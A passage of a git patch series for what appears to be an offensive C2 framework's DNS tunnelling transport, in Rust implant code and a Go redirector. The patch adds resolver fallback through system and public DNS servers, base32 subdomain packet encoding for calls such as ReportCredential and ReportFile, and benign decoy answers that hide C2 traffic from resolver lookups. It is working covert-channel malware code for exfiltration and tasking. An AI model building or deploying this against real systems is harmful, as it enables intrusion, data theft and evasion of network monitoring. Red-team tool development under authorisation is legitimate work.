read system DNS config: {}", _e); + } + } + + // Always add fallback servers (Cloudflare and Google) + // Add only if not already in the list + let fallbacks = vec!["1.1.1.1:53".to_string(), "8.8.8.8:53".to_string()]; + for fallback in fallbacks { + if !resolvers.contains(&fallback) { + resolvers.push(fallback); + } + } + + resolvers +} + /// Map gRPC method path to 2-character code /// Codes: ct=ClaimTasks, fa=FetchAsset, rc=ReportCredential, /// rf=ReportFile, rp=ReportProcessList, rt=ReportTaskOutput @@ -89,7 +140,9 @@ fn method_to_code(method: &str) -> String { /// Supports TXT, A, and AAAA record types with automatic fallback. #[derive(Debug, Clone)] pub struct DNS { - dns_server: Option, // None = use system resolver + dns_server: Option, // Some(server) = use explicit server, None = use resolver array + dns_resolvers: Vec, // Array of resolvers (system + fallbacks) when dns_server is None + current_resolver_index: usize, // Current index in dns_resolvers array base_domain: String, socket: Option>, preferred_record_type: u16, // User's preferred type (TXT/A/AAAA) @@ -105,9 +158,15 @@ impl DNS { let base_with_dot = self.base_domain.len() + 1; let total_available = MAX_DNS_NAME_LEN.saturating_sub(base_with_dot); - // Base32 encoding: ((HEADER_SIZE + data) * 8 / 5) <= total_available - // Solve for data: data <= (total_available * 5 / 8) - HEADER_SIZE - let max_raw_packet = (total_available * 5) / 8; + // Account for dots between labels (every 63 chars needs a dot separator) + // If we have N chars, we need ceil(N/63) - 1 dots + // To be safe, estimate: for every 63 chars, we lose 1 char to a dot + // So effective available space is: total_available * 63 / 64 + let effective_available = (total_available * 63) / 64; + + // Base32 encoding: ((HEADER_SIZE + data) * 8 / 5) <= effective_available + // Solve for data: data <= (effective_available * 5 / 8) - HEADER_SIZE + let max_raw_packet = (effective_available * 5) / 8; max_raw_packet.saturating_sub(HEADER_SIZE) } @@ -404,6 +463,7 @@ impl DNS { } /// Send a single DNS query and receive response, with record type fallback + /// and resolver fallback (when using system resolvers) async fn send_query(&mut self, subdomain: &str) -> Result> { use rand::Rng; @@ -441,89 +501,156 @@ impl DNS { log::trace!("Attempting DNS query with record type: {}", type_name); } - // Generate random transaction ID - let transaction_id: u16 = rand::thread_rng().gen(); - let query = self.build_dns_query(subdomain, transaction_id, record_type); - - // Determine DNS server to use - let target = if let Some(ref server) = self.dns_server { - server.clone() + // If using system resolver, try all resolvers in the array + // If using explicit server, only try that one + let resolvers_to_try: Vec = if let Some(ref server) = self.dns_server { + // Explicit DNS server specified + vec![server.clone()] } else { - // Use system resolver - send to localhost:53 - "127.0.0.1:53".to_string() - }; + // Use resolver array (system + fallbacks) + if self.dns_resolvers.is_empty() { + return Err(anyhow::anyhow!("No DNS resolvers available")); + } - // Send query - match socket.send_to(&query, &target).await { - Ok(_) => {} - Err(e) => { - #[cfg(debug_assertions)] - log::trace!("Failed to send query: {}", e); - continue; // Try next record type + // Try all resolvers starting from current index + let mut resolvers = Vec::new(); + for i in 0..self.dns_resolvers.len() { + let idx = (self.current_resolver_index + i) % self.dns_resolvers.len(); + resolvers.push(self.dns_resolvers[idx].clone()); } - } + resolvers + }; - // Receive response(s) until we get one with matching transaction ID - let deadline = tokio::time::Instant::now() + tokio::time::Duration::from_secs(5); - let mut buf = [0u8; 4096]; + // Try each resolver + for (resolver_attempt, target) in resolvers_to_try.iter().enumerate() { + #[cfg(debug_assertions)] + log::trace!( + "Attempting query to resolver {} (attempt {}/{})", + target, + resolver_attempt + 1, + resolvers_to_try.len() + ); - loop { - let remaining = deadline.saturating_duration_since(tokio::time::Instant::now()); - if remaining.is_zero() { - // Timeout - try next record type - break; + // Generate random transaction ID + let transaction_id: u16 = rand::thread_rng().gen(); + let query = self.build_dns_query(subdomain, transaction_id, record_type); + + // Send query + match socket.send_to(&query, target).await { + Ok(_) => {} + Err(_e) => { + #[cfg(debug_assertions)] + log::trace!("Failed to send query to {}: {}", target, _e); + + // If using resolver array, advance to next resolver + if self.dns_server.is_none() && !self.dns_resolvers.is_empty() { + self.current_resolver_index = + (self.current_resolver_index + 1) % self.dns_resolvers.len(); + } + continue; // Try next resolver + } } - match tokio::time::timeout(remaining, socket.recv_from(&mut buf)).await { - Ok(Ok((len, _))) => { - // Check if transaction ID matches - if len >= 2 { - let response_id = u16::from_be_bytes([buf[0], buf[1]]); - if response_id == transaction_id { - // Check for DNS error (RCODE in flags) - if len >= 4 { - let rcode = buf[3] & 0x0F; // Last 4 bits of flags - if rcode != 0 { - // DNS error response - try next record type - #[cfg(debug_assertions)] - log::trace!("DNS error response, RCODE={}", rcode); - break; - } - } + // Receive response(s) until we get one with matching transaction ID + let deadline = tokio::time::Instant::now() + tokio::time::Duration::from_secs(DNS_QUERY_TIMEOUT_SECS); + let mut buf = [0u8; MAX_DNS_PACKET_SIZE]; + let mut timed_out = false; + + loop { + let remaining = deadline.saturating_duration_since(tokio::time::Instant::now()); + if remaining.is_zero() { + // Timeout - try next resolver or record type + timed_out = true; + break; + } - // Matching response found - match self.parse_dns_response(&buf[..len]) { - Ok(data) => { - // Accept both empty and non-empty responses - // (data packets return empty ACK, others return data) - self.current_record_type = record_type; - return Ok(data); + match tokio::time::timeout(remaining, socket.recv_from(&mut buf)).await { + Ok(Ok((len, _))) => { + // Check if transaction ID matches + if len >= 2 { + let response_id = u16::from_be_bytes([buf[0], buf[1]]); + if response_id == transaction_id { + // Check for DNS error (RCODE in flags) + if len >= 4 { + let rcode = buf[3] & 0x0F; // Last 4 bits of flags + if rcode != 0 { + // DNS error response - try next resolver + #[cfg(debug_assertions)] + log::trace!( + "DNS error response from {}, RCODE={}", + target, + rcode + ); + break; + } } - Err(_) => { - break; + + // Matching response found + match self.parse_dns_response(&buf[..len]) { + Ok(data) => { + // Accept both empty and non-empty responses + // (data packets return empty ACK, others return data) + self.current_record_type = record_type; + + #[cfg(debug_assertions)] + log::trace!("Successful response from {}", target); + + return Ok(data); + } + Err(_e) => { + #[cfg(debug_assertions)] + log::trace!( + "Failed to parse response from {}: {}", + target, + _e + ); + break; + } } } + // Wrong transaction ID - keep waiting for the right one + #[cfg(debug_assertions)] + log::trace!( + "Ignoring DNS response with mismatched transaction ID: expected {}, got {}", + transaction_id, + response_id + ); } - // Wrong transaction ID - keep waiting for the right one + } + Ok(Err(_e)) => { #[cfg(debug_assertions)] - log::trace!("Ignoring DNS response with mismatched transaction ID: expected {}, got {}", transaction_id, response_id); + log::trace!("Failed to receive response from {}: {}", target, _e); + break; // Try next resolver + } + Err(_) => { + // Timeout - try next resolver + timed_out = true; + break; } } - Ok(Err(e)) => { - #[cfg(debug_assertions)] - log::trace!("Failed to receive response: {}", e); - break; // Try next record type - } - Err(_) => { - // Timeout - try next record type - break; - } + } + + // If we timed out or got an error, advance to next resolver in array + if (timed_out || resolver_attempt < resolvers_to_try.len() - 1) + && self.dns_server.is_none() + && !self.dns_resolvers.is_empty() + { + self.current_resolver_index = + (self.current_resolver_index + 1) % self.dns_resolvers.len(); + + #[cfg(debug_assertions)] + log::trace!( + "Moving to next resolver, now at index {}", + self.current_resolver_index + ); } } } - // All record types failed - Err(anyhow::anyhow!("All DNS record types failed")) + // All record types and resolvers failed + Err(anyhow::anyhow!( + "All DNS record types and resolvers failed" + )) } /// Send init packet and receive conversation ID from server @@ -578,7 +705,7 @@ impl DNS { // Binary chunked indicator format (for A records): // Byte 0: 0xFF (magic) // Bytes 1-2: chunk count (uint16 big-endian) - // Byte 3: CRC low byte + // Byte 3: CRC low byte - for integrity check, only low byte is used due to size constraints let total_chunks = u16::from_be_bytes([response[1], response[2]]) as usize; let crc_low = response[3]; @@ -725,12 +852,12 @@ impl DNS { attempt + 1 ); } - Ok(Err(e)) => { + Ok(Err(_e)) => { #[cfg(debug_assertions)] log::warn!( "Init packet attempt {}: send_query failed: {}", attempt + 1, - e + _e ); } Err(_) => { @@ -832,7 +959,7 @@ impl DNS { // Binary chunked indicator format (for A records): // Byte 0: 0xFF (magic) // Bytes 1-2: chunk count (uint16 big-endian) - // Byte 3: CRC low byte + // Byte 3: CRC low byte - for integrity check, only low byte is used due to size constraints let total_chunks = u16::from_be_bytes([response[1], response[2]]) as usize; let crc_low = response[3]; @@ -1045,58 +1172,8 @@ impl DNS { Ok(decoded) } - /// Perform a complete request-response cycle via DNS - /// Perform a DNS-based RPC exchange with automatic retry on failure + /// Perform a DNS-based RPC exchange async fn dns_exchange(&mut self, method: &str, data: &[u8]) -> Result> { - let mut last_error = None; - - for attempt in 0..EXCHANGE_MAX_RETRIES { - match self.dns_exchange_attempt(method, data).await { - Ok(response) => { - #[cfg(debug_assertions)] - if attempt > 0 { - log::info!( - "DNS exchange succeeded on attempt {}/{}", - attempt + 1, - EXCHANGE_MAX_RETRIES - ); - } - return Ok(response); - } - Err(e) => { - #[cfg(debug_assertions)] - log::warn!( - "DNS exchange attempt {}/{} failed: {}", - attempt + 1, - EXCHANGE_MAX_RETRIES, - e - ); - - last_error = Some(e); - - if attempt < EXCHANGE_MAX_RETRIES - 1 { - // Exponential backoff: 3s, 6s, 12s, 24s - let delay = EXCHANGE_RETRY_DELAY_SECS * (1 << attempt); - - #[cfg(debug_assertions)] - log::info!("Retrying DNS exchange in {} seconds...", delay); - - tokio::time::sleep(tokio::time::Duration::from_secs(delay)).await; - } - } - } - } - - Err(last_error.unwrap_or_else(|| { - anyhow::anyhow!( - "DNS exchange failed after {} attempts", - EXCHANGE_MAX_RETRIES - ) - })) - } - - /// Internal implementation of DNS exchange (single attempt) - async fn dns_exchange_attempt(&mut self, method: &str, data: &[u8]) -> Result> { // Lazy initialize socket if self.socket.is_none() { let socket = UdpSocket::bind("0.0.0.0:0") @@ -1169,6 +1246,8 @@ impl Transport for DNS { fn init() -> Self { DNS { dns_server: None, + dns_resolvers: Vec::new(), + current_resolver_index: 0, base_domain: String::new(), socket: None, preferred_record_type: TXT_RECORD_TYPE, @@ -1250,8 +1329,17 @@ impl Transport for DNS { } } + // Build resolver array if using system resolver (dns_server is None) + let dns_resolvers = if dns_server.is_none() { + build_resolver_array() + } else { + Vec::new() + }; + Ok(DNS { dns_server, + dns_resolvers, + current_resolver_index: 0, base_domain, socket: None, preferred_record_type, @@ -1345,11 +1433,15 @@ impl Transport for DNS { // This is necessary because iterating over the sync receiver would block the async task let handle = tokio::spawn(async move { let mut all_chunks = Vec::new(); + #[cfg_attr(not(debug_assertions), allow(unused_variables))] let mut chunk_count = 0; // Iterate over the sync channel receiver in a spawned task to avoid blocking for chunk in request { - chunk_count += 1; + #[cfg(debug_assertions)] + { + chunk_count += 1; + } let chunk_bytes = marshal_with_codec::(chunk)?; all_chunks.extend_from_slice(&(chunk_bytes.len() as u32).to_be_bytes()); @@ -1461,6 +1553,8 @@ mod tests { fn test_calculate_max_data_size_positive() { let dns = DNS { dns_server: None, + dns_resolvers: Vec::new(), + current_resolver_index: 0, base_domain: "c2.example.com".to_string(), socket: None, preferred_record_type: TXT_RECORD_TYPE, @@ -1474,6 +1568,8 @@ mod tests { // Test with a very long base domain - should be smaller let dns_long = DNS { dns_server: None, + dns_resolvers: Vec::new(), + current_resolver_index: 0, base_domain: "very.long.subdomain.hierarchy.for.testing.purposes.c2.example.com" .to_string(), socket: None, @@ -1624,4 +1720,35 @@ mod tests { let err_msg = result.unwrap_err().to_string(); assert!(err_msg.contains("reverse shell") || err_msg.contains("not support")); } + + #[test] + fn test_dns_new_with_wildcard_builds_resolver_array() { + let dns = DNS::new("dns://*/c2.example.com".to_string(), None).unwrap(); + + assert!(dns.dns_server.is_none(), "dns_server should be None for wildcard"); + assert!(!dns.dns_resolvers.is_empty(), "dns_resolvers array should be populated"); + + // Should always have at least Cloudflare and Google fallbacks + assert!(dns.dns_resolvers.len() >= 2, "Should have at least 2 resolvers (fallbacks)"); + + // Check that Cloudflare and Google are in the list (they should be at the end) + let has_cloudflare = dns.dns_resolvers.iter().any(|s| s == "1.1.1.1:53"); + let has_google = dns.dns_resolvers.iter().any(|s| s == "8.8.8.8:53"); + + assert!(has_cloudflare, "Should have Cloudflare (1.1.1.1:53) in resolver list"); + assert!(has_google, "Should have Google (8.8.8.8:53) in resolver list"); + + assert_eq!(dns.current_resolver_index, 0, "Should start at index 0"); + + #[cfg(debug_assertions)] + println!("Resolver array: {:?}", dns.dns_resolvers); + } + + #[test] + fn test_dns_new_with_explicit_server_no_resolver_array() { + let dns = DNS::new("dns://8.8.8.8/c2.example.com".to_string(), None).unwrap(); + + assert_eq!(dns.dns_server, Some("8.8.8.8:53".to_string())); + assert!(dns.dns_resolvers.is_empty(), "dns_resolvers should be empty with explicit server"); + } } diff --git a/tavern/internal/redirectors/dns/dns.go b/tavern/internal/redirectors/dns/dns.go index 804c750b6..26702282b 100644 --- a/tavern/internal/redirectors/dns/dns.go +++ b/tavern/internal/redirectors/dns/dns.go @@ -241,6 +241,9 @@ func (r *Redirector) handleDNSQuery(ctx context.Context, conn *net.UDPConn, addr return } + // Normalize domain to lowercase for case-insensitive matching + domain = strings.ToLower(domain) + slog.Debug("received DNS query", "domain", domain, "query_type", queryType, "from", addr.String()) domainParts := strings.Split(domain, ".") @@ -288,6 +291,13 @@ func (r *Redirector) handleDNSQuery(ctx context.Context, conn *net.UDPConn, addr // Decode base32 to get raw packet bytes packetBytes, err := decodeBase32(fullSubdomain) if err != nil { + // For A/AAAA queries, this is likely a DNS resolver doing lookups (not C2 traffic) + // Return a benign response instead of an error to avoid polluting logs + if queryType == aRecordType || queryType == aaaaRecordType { + slog.Debug("ignoring non-C2 resolver query", "query_type", queryType, "domain", domain) + r.sendBenignResponse(conn, addr, transactionID, domain, queryType) + return + } slog.Debug("failed to decode base32 subdomain", "error", err, "subdomain", fullSubdomain[:min(len(fullSubdomain), 50)]) r.sendErrorResponse(conn, addr, transactionID) return @@ -295,6 +305,12 @@ func (r *Redirector) handleDNSQuery(ctx context.Context, conn *net.UDPConn, addr // Parse packet: [type:1][seq:5][convid:12][data...] if len(packetBytes) < headerSize { + // For A/AAAA queries with invalid packet structure, likely resolver lookups + if queryType == aRecordType || queryType == aaaaRecordType { + slog.Debug("ignoring malformed resolver query", "query_type", queryType, "domain", domain, "size", len(packetBytes)) + r.sendBenignResponse(conn, addr, transactionID, domain, queryType) + return + } slog.Debug("packet too short after decoding", "size", len(packetBytes), "min_size", headerSize) r.sendErrorResponse(conn, addr, transactionID) return @@ -309,6 +325,12 @@ func (r *Redirector) handleDNSQuery(ctx context.Context, conn *net.UDPConn, addr seq, err := decodeSeq(seqStr) if err != nil { + // For A/AAAA queries, invalid sequence likely means resolver lookup + if queryType == aRecordType || queryType == aaaaRecordType { + slog.Debug("ignoring resolver query with invalid sequence", "query_type", queryType, "domain", domain) + r.sendBenignResponse(conn, addr, transactionID, domain, queryType) + return + } slog.Debug("invalid sequence", "seq", seqStr, "error", err) r.sendErrorResponse(conn, addr, transactionID) return @@ -505,6 +527,7 @@ func (r *Redirector) HandleDataPacket(convID string, seq int, data []byte) ([]by slog.Debug("received chunk", "conv_id", convID, "seq", seq, "chunk_len", len(data), "total_received", len(conv.Chunks), "expected_total", conv.TotalChunks, "data_preview", dataPreview) + // Return acknowledgment return []byte{}, nil } @@ -906,6 +929,22 @@ func (r *Redirector) sendErrorResponse(conn *net.UDPConn, addr *net.UDPAddr, tra conn.WriteToUDP(response, addr) } +// sendBenignResponse sends a benign DNS response for resolver queries +// Returns 127.0.0.1 for A, ::1 for AAAA, empty TXT for others +func (r *Redirector) sendBenignResponse(conn *net.UDPConn, addr *net.UDPAddr, transactionID uint16, domain string, queryType uint16) { + var data []byte + switch queryType { + case aRecordType: + data = []byte{127, 0, 0, 1} // localhost + case aaaaRecordType: + data = make([]byte, 16) // ::1 + data[15] = 1 + default: + data = []byte{} // empty response + } + r.sendDNSResponse(conn, addr, transactionID, domain, data, queryType) +} + // generateConvID generates a random conversation ID func generateConvID() string { const chars = "0123456789abcdefghijklmnopqrstuvwxyz" From dfe0ee8b3c219bbb7729825004b2b8d38ed29a6e Mon Sep 17 00:00:00 2001 From: KaliPatriot <43020092+KaliPatriot@users.noreply.github.com> Date: Fri, 5 Dec 2025 22:52:46 -0600 Subject: [PATCH 04/17] fmt, fixed more hardcoded values --- implants/lib/transport/src/dns.rs | 186 +++++++++++++++++-------- tavern/internal/redirectors/dns/dns.go | 68 ++++++--- 2 files changed, 175 insertions(+), 79 deletions(-) diff --git a/implants/lib/transport/src/dns.rs b/implants/lib/transport/src/dns.rs index b4f496105..a7fcf4ca1 100644 --- a/implants/lib/transport/src/dns.rs +++ b/implants/lib/transport/src/dns.rs @@ -48,6 +48,50 @@ const CHUNK_TIMEOUT_SECS: u64 = 20; const MAX_DNS_PACKET_SIZE: usize = 4096; // Maximum DNS response size const DNS_QUERY_TIMEOUT_SECS: u64 = 5; // Timeout for individual DNS queries +// DNS server configuration +const DEFAULT_DNS_PORT: &str = "53"; +const FALLBACK_DNS_CLOUDFLARE: &str = "1.1.1.1"; +const FALLBACK_DNS_GOOGLE: &str = "8.8.8.8"; + +// Base36 encoding math constants (for sequence and CRC encoding) +const BASE36_RADIX: usize = 36; +const BASE36_POW_2: usize = 1296; // 36^2 +const BASE36_POW_3: usize = 46656; // 36^3 +const BASE36_POW_4: usize = 1679616; // 36^4 + +// CRC16-CCITT constants +const CRC16_INIT: u16 = 0xFFFF; +const CRC16_POLYNOMIAL: u16 = 0x1021; +const CRC16_HIGH_BIT: u16 = 0x8000; +const CRC16_LOW_BYTE_MASK: u16 = 0xFF; + +// DNS protocol constants +const DNS_QUERY_FLAG_STANDARD: [u8; 2] = [0x01, 0x00]; +const DNS_COMPRESSION_PTR_MASK: u8 = 0xC0; +const DNS_RCODE_MASK: u8 = 0x0F; + +// Retry and timing constants +const MAX_MISSING_CHUNK_RETRIES: usize = 5; +const MAX_CHUNKED_INDICATOR_FETCHES: usize = 10; +const MISSING_CHUNK_DELAY_MS: u64 = 50; +const BACKOFF_BASE_SECS: u64 = 1; +const BACKOFF_RETRY_DELAY_SECS: u64 = 2; + +// Label size calculation constants +const DNS_LABEL_OVERHEAD_DIVISOR: usize = 64; +const DNS_LABEL_USABLE_RATIO: usize = 63; + +// Base32 encoding ratio (8 bits to 5 bits, so 8/5 expansion) +const BASE32_ENCODE_NUMERATOR: usize = 8; +const BASE32_ENCODE_DENOMINATOR: usize = 5; + +// Binary chunking indicator +const BINARY_CHUNK_MAGIC: u8 = 0xFF; + +// URL parsing constants +const URL_SCHEME_PREFIX: &str = "dns://"; +const SYSTEM_RESOLVER_WILDCARD: &str = "*"; + // gRPC method paths static CLAIM_TASKS_PATH: &str = "/c2.C2/ClaimTasks"; static FETCH_ASSET_PATH: &str = "/c2.C2/FetchAsset"; @@ -95,7 +139,11 @@ fn build_resolver_array() -> Vec { #[cfg(debug_assertions)] if !resolvers.is_empty() { - log::debug!("Found {} system DNS servers: {:?}", resolvers.len(), resolvers); + log::debug!( + "Found {} system DNS servers: {:?}", + resolvers.len(), + resolvers + ); } else { log::debug!("System DNS config returned no servers"); } @@ -108,7 +156,10 @@ fn build_resolver_array() -> Vec { // Always add fallback servers (Cloudflare and Google) // Add only if not already in the list - let fallbacks = vec!["1.1.1.1:53".to_string(), "8.8.8.8:53".to_string()]; + let fallbacks = vec![ + format!("{}:{}", FALLBACK_DNS_CLOUDFLARE, DEFAULT_DNS_PORT), + format!("{}:{}", FALLBACK_DNS_GOOGLE, DEFAULT_DNS_PORT), + ]; for fallback in fallbacks { if !resolvers.contains(&fallback) { resolvers.push(fallback); @@ -140,9 +191,9 @@ fn method_to_code(method: &str) -> String { /// Supports TXT, A, and AAAA record types with automatic fallback. #[derive(Debug, Clone)] pub struct DNS { - dns_server: Option, // Some(server) = use explicit server, None = use resolver array - dns_resolvers: Vec, // Array of resolvers (system + fallbacks) when dns_server is None - current_resolver_index: usize, // Current index in dns_resolvers array + dns_server: Option, // Some(server) = use explicit server, None = use resolver array + dns_resolvers: Vec, // Array of resolvers (system + fallbacks) when dns_server is None + current_resolver_index: usize, // Current index in dns_resolvers array base_domain: String, socket: Option>, preferred_record_type: u16, // User's preferred type (TXT/A/AAAA) @@ -162,11 +213,13 @@ impl DNS { // If we have N chars, we need ceil(N/63) - 1 dots // To be safe, estimate: for every 63 chars, we lose 1 char to a dot // So effective available space is: total_available * 63 / 64 - let effective_available = (total_available * 63) / 64; + let effective_available = + (total_available * DNS_LABEL_USABLE_RATIO) / DNS_LABEL_OVERHEAD_DIVISOR; // Base32 encoding: ((HEADER_SIZE + data) * 8 / 5) <= effective_available // Solve for data: data <= (effective_available * 5 / 8) - HEADER_SIZE - let max_raw_packet = (effective_available * 5) / 8; + let max_raw_packet = + (effective_available * BASE32_ENCODE_DENOMINATOR) / BASE32_ENCODE_NUMERATOR; max_raw_packet.saturating_sub(HEADER_SIZE) } @@ -180,11 +233,11 @@ impl DNS { fn encode_seq(seq: usize) -> String { const BASE36: &[u8] = b"0123456789abcdefghijklmnopqrstuvwxyz"; - let digit4 = (seq / 1679616) % 36; // 36^4 - let digit3 = (seq / 46656) % 36; // 36^3 - let digit2 = (seq / 1296) % 36; // 36^2 - let digit1 = (seq / 36) % 36; // 36^1 - let digit0 = seq % 36; // 36^0 + let digit4 = (seq / BASE36_POW_4) % BASE36_RADIX; + let digit3 = (seq / BASE36_POW_3) % BASE36_RADIX; + let digit2 = (seq / BASE36_POW_2) % BASE36_RADIX; + let digit1 = (seq / BASE36_RADIX) % BASE36_RADIX; + let digit0 = seq % BASE36_RADIX; format!( "{}{}{}{}{}", BASE36[digit4] as char, @@ -212,21 +265,21 @@ impl DNS { } }; - Ok(val(chars[0])? * 1679616 - + val(chars[1])? * 46656 - + val(chars[2])? * 1296 - + val(chars[3])? * 36 + Ok(val(chars[0])? * BASE36_POW_4 + + val(chars[1])? * BASE36_POW_3 + + val(chars[2])? * BASE36_POW_2 + + val(chars[3])? * BASE36_RADIX + val(chars[4])?) } - /// Calculate CRC16-CCITT checksum (polynomial 0x1021, init 0xFFFF) + /// Calculate CRC16-CCITT checksum fn calculate_crc16(data: &[u8]) -> u16 { - let mut crc: u16 = 0xFFFF; + let mut crc: u16 = CRC16_INIT; for byte in data { crc ^= (*byte as u16) << 8; for _ in 0..8 { - if (crc & 0x8000) != 0 { - crc = (crc << 1) ^ 0x1021; + if (crc & CRC16_HIGH_BIT) != 0 { + crc = (crc << 1) ^ CRC16_POLYNOMIAL; } else { crc <<= 1; } @@ -239,10 +292,10 @@ impl DNS { fn encode_base36_crc(crc: u16) -> String { const BASE36: &[u8] = b"0123456789abcdefghijklmnopqrstuvwxyz"; let crc_val = crc as usize; - let digit3 = (crc_val / 46656) % 36; // 36^3 - let digit2 = (crc_val / 1296) % 36; // 36^2 - let digit1 = (crc_val / 36) % 36; // 36^1 - let digit0 = crc_val % 36; // 36^0 + let digit3 = (crc_val / BASE36_POW_3) % BASE36_RADIX; + let digit2 = (crc_val / BASE36_POW_2) % BASE36_RADIX; + let digit1 = (crc_val / BASE36_RADIX) % BASE36_RADIX; + let digit0 = crc_val % BASE36_RADIX; format!( "{}{}{}{}", BASE36[digit3] as char, @@ -270,8 +323,10 @@ impl DNS { } }; - let crc = - val(chars[0])? * 46656 + val(chars[1])? * 1296 + val(chars[2])? * 36 + val(chars[3])?; + let crc = val(chars[0])? * BASE36_POW_3 + + val(chars[1])? * BASE36_POW_2 + + val(chars[2])? * BASE36_RADIX + + val(chars[3])?; Ok(crc as u16) } @@ -354,7 +409,7 @@ impl DNS { // DNS Header (12 bytes) query.extend_from_slice(&transaction_id.to_be_bytes()); // Transaction ID - query.extend_from_slice(&[0x01, 0x00]); // Flags: Standard query + query.extend_from_slice(&DNS_QUERY_FLAG_STANDARD); // Flags: Standard query query.extend_from_slice(&[0x00, 0x01]); // Questions: 1 query.extend_from_slice(&[0x00, 0x00]); // Answer RRs: 0 query.extend_from_slice(&[0x00, 0x00]); // Authority RRs: 0 @@ -417,7 +472,7 @@ impl DNS { if b == 0 { offset += 1; break; - } else if (b & 0xC0) == 0xC0 { + } else if (b & DNS_COMPRESSION_PTR_MASK) == DNS_COMPRESSION_PTR_MASK { // Pointer offset += 2; break; @@ -552,7 +607,8 @@ impl DNS { } // Receive response(s) until we get one with matching transaction ID - let deadline = tokio::time::Instant::now() + tokio::time::Duration::from_secs(DNS_QUERY_TIMEOUT_SECS); + let deadline = tokio::time::Instant::now() + + tokio::time::Duration::from_secs(DNS_QUERY_TIMEOUT_SECS); let mut buf = [0u8; MAX_DNS_PACKET_SIZE]; let mut timed_out = false; @@ -572,7 +628,7 @@ impl DNS { if response_id == transaction_id { // Check for DNS error (RCODE in flags) if len >= 4 { - let rcode = buf[3] & 0x0F; // Last 4 bits of flags + let rcode = buf[3] & DNS_RCODE_MASK; // Last 4 bits of flags if rcode != 0 { // DNS error response - try next resolver #[cfg(debug_assertions)] @@ -648,9 +704,7 @@ impl DNS { } // All record types and resolvers failed - Err(anyhow::anyhow!( - "All DNS record types and resolvers failed" - )) + Err(anyhow::anyhow!("All DNS record types and resolvers failed")) } /// Send init packet and receive conversation ID from server @@ -700,8 +754,8 @@ impl DNS { .await { Ok(Ok(response)) if !response.is_empty() => { - // Check if response is binary chunked indicator (magic byte 0xFF) - if response.len() >= 4 && response[0] == 0xFF { + // Check if response is binary chunked indicator + if response.len() >= 4 && response[0] == BINARY_CHUNK_MAGIC { // Binary chunked indicator format (for A records): // Byte 0: 0xFF (magic) // Bytes 1-2: chunk count (uint16 big-endian) @@ -754,8 +808,8 @@ impl DNS { let mut full_indicator = response_str.clone(); let mut fetch_seq = 0; - // Try up to 10 fetches to get the full indicator - while fetch_seq < 10 { + // Try up to MAX_CHUNKED_INDICATOR_FETCHES to get the full indicator + while fetch_seq < MAX_CHUNKED_INDICATOR_FETCHES { let subdomain = self.build_packet(TYPE_FETCH, fetch_seq, &temp_conv_id, &[])?; match self.send_query(&subdomain).await { @@ -871,7 +925,7 @@ impl DNS { } if attempt < MAX_RETRIES - 1 { - let delay = 1 << attempt; // Exponential backoff: 1s, 2s, 4s, 8s, 16s + let delay = BACKOFF_BASE_SECS << attempt; // Exponential backoff: 1s, 2s, 4s, 8s, 16s #[cfg(debug_assertions)] log::debug!("Waiting {}s before retry...", delay); tokio::time::sleep(tokio::time::Duration::from_secs(delay)).await; @@ -932,7 +986,10 @@ impl DNS { } _ => { if attempt < MAX_RETRIES - 1 { - tokio::time::sleep(tokio::time::Duration::from_secs(2)).await; + tokio::time::sleep(tokio::time::Duration::from_secs( + BACKOFF_RETRY_DELAY_SECS, + )) + .await; } } } @@ -952,10 +1009,8 @@ impl DNS { chunks: &[Vec], retry_count: usize, ) -> Result> { - const MAX_MISSING_CHUNK_RETRIES: usize = 5; - - // Check if response is binary chunked indicator (magic byte 0xFF) - if response.len() >= 4 && response[0] == 0xFF { + // Check if response is binary chunked indicator + if response.len() >= 4 && response[0] == BINARY_CHUNK_MAGIC { // Binary chunked indicator format (for A records): // Byte 0: 0xFF (magic) // Bytes 1-2: chunk count (uint16 big-endian) @@ -1027,7 +1082,7 @@ impl DNS { } // Small delay to let resent chunks arrive before sending end packet again - tokio::time::sleep(tokio::time::Duration::from_millis(50)).await; + tokio::time::sleep(tokio::time::Duration::from_millis(MISSING_CHUNK_DELAY_MS)).await; // Retry end packet let last_seq = chunks.len().saturating_sub(1); @@ -1147,7 +1202,7 @@ impl DNS { let crc_match = if is_text_chunking { actual_crc == expected_crc } else { - (actual_crc & 0xFF) == (expected_crc & 0xFF) + (actual_crc & CRC16_LOW_BYTE_MASK) == (expected_crc & CRC16_LOW_BYTE_MASK) }; if !crc_match { @@ -1262,7 +1317,7 @@ impl Transport for DNS { // dns://8.8.8.8/c2.example.com - Specific server, TXT with fallback // dns://*/c2.example.com?type=A - System resolver, prefer A records // dns://*/c2.example.com?fallback=false - TXT only, no fallback - let url = callback.trim_start_matches("dns://"); + let url = callback.trim_start_matches(URL_SCHEME_PREFIX); // Split URL and query params let (server_domain, query_params) = if let Some(idx) = url.find('?') { @@ -1279,13 +1334,13 @@ impl Transport for DNS { )); } - let dns_server = if parts[0] == "*" { + let dns_server = if parts[0] == SYSTEM_RESOLVER_WILDCARD { // Use system resolver None } else if parts[0].contains(':') { Some(parts[0].to_string()) } else { - Some(format!("{}:53", parts[0])) + Some(format!("{}:{}", parts[0], DEFAULT_DNS_PORT)) }; let base_domain = parts[1].to_string(); @@ -1433,10 +1488,11 @@ impl Transport for DNS { // This is necessary because iterating over the sync receiver would block the async task let handle = tokio::spawn(async move { let mut all_chunks = Vec::new(); - #[cfg_attr(not(debug_assertions), allow(unused_variables))] - let mut chunk_count = 0; // Iterate over the sync channel receiver in a spawned task to avoid blocking + #[cfg(debug_assertions)] + let mut chunk_count = 0; + for chunk in request { #[cfg(debug_assertions)] { @@ -1725,18 +1781,33 @@ mod tests { fn test_dns_new_with_wildcard_builds_resolver_array() { let dns = DNS::new("dns://*/c2.example.com".to_string(), None).unwrap(); - assert!(dns.dns_server.is_none(), "dns_server should be None for wildcard"); - assert!(!dns.dns_resolvers.is_empty(), "dns_resolvers array should be populated"); + assert!( + dns.dns_server.is_none(), + "dns_server should be None for wildcard" + ); + assert!( + !dns.dns_resolvers.is_empty(), + "dns_resolvers array should be populated" + ); // Should always have at least Cloudflare and Google fallbacks - assert!(dns.dns_resolvers.len() >= 2, "Should have at least 2 resolvers (fallbacks)"); + assert!( + dns.dns_resolvers.len() >= 2, + "Should have at least 2 resolvers (fallbacks)" + ); // Check that Cloudflare and Google are in the list (they should be at the end) let has_cloudflare = dns.dns_resolvers.iter().any(|s| s == "1.1.1.1:53"); let has_google = dns.dns_resolvers.iter().any(|s| s == "8.8.8.8:53"); - assert!(has_cloudflare, "Should have Cloudflare (1.1.1.1:53) in resolver list"); - assert!(has_google, "Should have Google (8.8.8.8:53) in resolver list"); + assert!( + has_cloudflare, + "Should have Cloudflare 